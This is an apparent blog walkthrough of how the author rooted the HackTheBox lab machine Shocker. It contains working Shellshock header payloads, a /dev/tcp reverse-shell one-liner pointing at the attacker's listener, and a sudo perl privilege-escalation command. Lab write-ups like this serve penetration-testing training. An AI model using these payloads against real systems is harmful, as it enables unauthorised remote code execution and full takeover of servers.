Shocker HackTheBox WalkThrough
![Shocker HackTheBox WalkThrough](https://ethicalhacs.com/media/2020/11/shocker-min.png)
This is Shocker HackTheBox machine walkthrough and is the 14th
machine of our OSCP like HTB boxes
series. In this writeup, I have demonstrated step-by-step how I rooted to Shocker HTB
machine. Before starting let us know something about this machine. It is a Linux
machine with IP address 10.10.10.56
and difficulty easy
assigned by its maker.
This machine is currently retired
so you will require VIP
subscription at hackthebox.eu
to access this machine. Before starting, connect your PC with HackTheBox VPN
so that you can have access to lab machines and make sure your connectivity with Shocker machine by pinging the IP 10.10.10.56. If all goes correct then start hacking. As usual I started by scanning the machine. Port scanning
gives us information about open ports and services running over them (banner grabbing). Used Nmap
[a port scanner] for this task and the result is below-
Scanning
$ nmap -sC -sV -oN shocker.nmap 10.10.10.56
![Nmap scan result in Shocker HackTheBox WalkThrough](https://ethicalhacs.com/media/2020/11/Nmap-scan-result-1.png)
Nmap revealed two
ports are open Apache2
web server on port 80
and OpenSSH
Server on port 2222
are running. Since apache2 is running on port 80 so we should have a website running over URL http://10.10.10.56/. Ongoing to this website found a simple html page which contains a coronavirus 🙂 and some text.
![Shocker hackthebox image](https://ethicalhacs.com/media/2020/11/Shocker-image.png)
Tried to see page-source
do we have any hint
hidden in the comments
section
or some URLs that could help in further enumeration. But unfortunately could not find anything. So tried to bruteforce
for hidden directories and files with $dirbuster
(a GUI tool to bruteforce directory and files) using the wordlist small.txt
and extension sh
, php
& txt
. This wordlist is present in the directory /usr/share/wordlists/dirb/
.
Directory Bruteforcing
![Performing Directory bruteforcing during Shocker HackTheBox WalkThrough](https://ethicalhacs.com/media/2020/11/Directory-bruteforce-2.png)
Directory bruteforcing
found a file user.sh
inside the folder cgi-bin
. So when I visited this URL http://10.10.10.56/cgi-bin/user.sh it started downloading this file. The Content-Type
of the file is text/plain
. It appears that this file is executing
every time whenever we try to access it because time present in this file changes every time it get executed.
![user.sh file content](https://ethicalhacs.com/media/2020/11/Content-of-user.sh-file.png)
Since user.sh
is a bash script and even it is running inside the folder cgi-bin
and also the website named shocker
along with a virus image
hinted me about the most famous shellshock vulnerability
in the web application. When I tested this web application for shellshock vulnerability I could easily confirmed that it is vulnerable to shellshock attack
. For more info about this vulnerability you can read this pdf
from OWASP.
Confirming Shellshock Vulnerability
To confirm the shellshock
vulnerability follow the given steps
1. Go to the URL http://10.10.10.56/cgi-bin/user.sh and capture the request in Burpsuite
.
2. Send the request
to repeater
for further analysis.
3. Go to the repeater
and replace the content of any of the header User-Agent
, Accept
, Accept-Language
, Accept-Encoding
, Connection
, Content-Length
by shellshock payload as given below.
User-Agent: () { :;}; echo; /usr/bin/id
![Confirming Remote Code Execution due to shellshock vulnerability in Shocker HackTheBox WalkThrough](https://ethicalhacs.com/media/2020/11/Confirming-shellshock-vulnerability-1024x233.png)
You can clearly see we have code execution on shocker machine when we send the request. You can also confirm this vulnerability by this one-liner.
$ curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'id'" http://10.10.10.56/cgi-bin/user.sh
![Confirming Remote Code Execution due to shellshock vulnerability using curl in Shocker HackTheBox WalkThrough](https://ethicalhacs.com/media/2020/11/Confirming-shellshock-using-curl-1024x68.png)
So we have successfully confirmed that we are able to execute code remotely on shocker machine using shellshock vulnerability. Let’s us get user shell using one liner.
Getting User Shell
To get reverse shell I did the following things.
1. Started netcat listener
2. Replaced the content of header User-Agent
with the following reverse shell payload
and sent the request
.
User-Agent: () { :;}; echo; /bin/sh -i >& /dev/tcp/10.10.14.6/1234 0>&1
![Getting User shell in shocker htb](https://ethicalhacs.com/media/2020/11/Getting-User-shell-1.png)
$ rlwrap nc -nvlp 1234
$whoami && id
![Receiving Shell on netcat](https://ethicalhacs.com/media/2020/11/Netcat-receiving-user-shell-1024x125.png)
We have got a shell let us upgrade it to fully qualified Linux shell so that we can run more advanced Linux command on it.
Shell Upgrade
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm
![Upgrading shell](https://ethicalhacs.com/media/2020/11/Upgrading-shell-1.png)
Let us capture user flag.
Capture User Flag
$ cat /home/shelly/user.txt
![Capturing User flag in Shocker HackTheBox WalkThrough](https://ethicalhacs.com/media/2020/11/User-shell-in-shocker.png)
Privilege Escalation
To escalate privilege to root we have to first find a privilege escalation vector
using which we can escalate privilege. For this I ran linpeas.sh
(a post exploitation enumeration script) on shocker machine
. Linpeas
find information of all potential vectors that can be used to escalate privilege to root.
Finding PrivEsc Vector
![Finding Privilege escalation vector](https://ethicalhacs.com/media/2020/11/Sudo-l-result-1-1024x127.png)
LinPEAS
found that user shelly
can run all
the command using perl
binary. You can also confirm the result by running $sudo -l
command. If you get such type of output like user can run (ALL : ALL) /usr/bin/perl
or something like this then the best place to get your exploit is GTFObin
. After going to https://gtfobins.github.io/gtfobins/perl/ URL you can find the exploit to escalate privilege. Here is the exploit snippet from GTFObin website.
![Exploit Snippet from GTFObin](https://ethicalhacs.com/media/2020/11/GTFObin-snippet.png)
I followed the same step as given in GTFObin and could easily got root shell just by running a command. So, here our PrivEsc
vector is Privilege Escalation
by Sudo Right Exploitation
.
Getting Root Shell
To upgrade
the shell to root shell I just copied and pasted the whole below code in one step and after pressing enter I was root.
$sudo perl -e 'exec "/bin/bash";'
# whoami && id
![Getting root shell in Shocker HackTheBox WalkThrough](https://ethicalhacs.com/media/2020/11/Root-shell-in-shocker.png)
Capture Root Flag
#cat /root/root.txt
![Capture root flag](https://ethicalhacs.com/media/2020/11/Root-flag-in-shocker-htb.png)
This was how I rooted Shocker HackTheBox machine. Learnt a lot during this challenge. Hope you guys have also learnt some new things. Thanks for reading this walkthrough. Share your experience in the comment section. Want to give any suggestion about the writeup feel free to write us at [email protected]. Check out our latest walkthroughs at https://ethicalhacs.com/.